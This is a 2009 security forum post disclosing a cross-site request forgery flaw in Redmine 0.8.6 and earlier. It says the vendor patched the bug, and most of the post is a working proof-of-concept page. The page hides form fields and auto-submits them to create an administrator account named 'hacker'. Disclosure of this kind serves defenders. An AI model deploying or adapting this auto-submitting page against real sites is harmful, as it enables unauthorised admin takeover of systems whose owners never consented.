Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Redmine <= 0.8.6 CSRF
Posted by: p0deje
Date: November 16, 2009 01:37PM

Redmine is a flexible project management web application. Written using Ruby on Rails framework, it is cross-platform and cross-database.

Prior to version 0.8.7, it was totally vulnerable to CSRF. I've coded some PoC that creates user with administrative rights. Redmine's SecTeam was informed and in two days they quickly released new version and patch.

Here is the PoC itself

<html>
<body>
<form method=POST action="http://www.site.org/users/new">
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
</body>
</html>

---------
http://p0deje.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.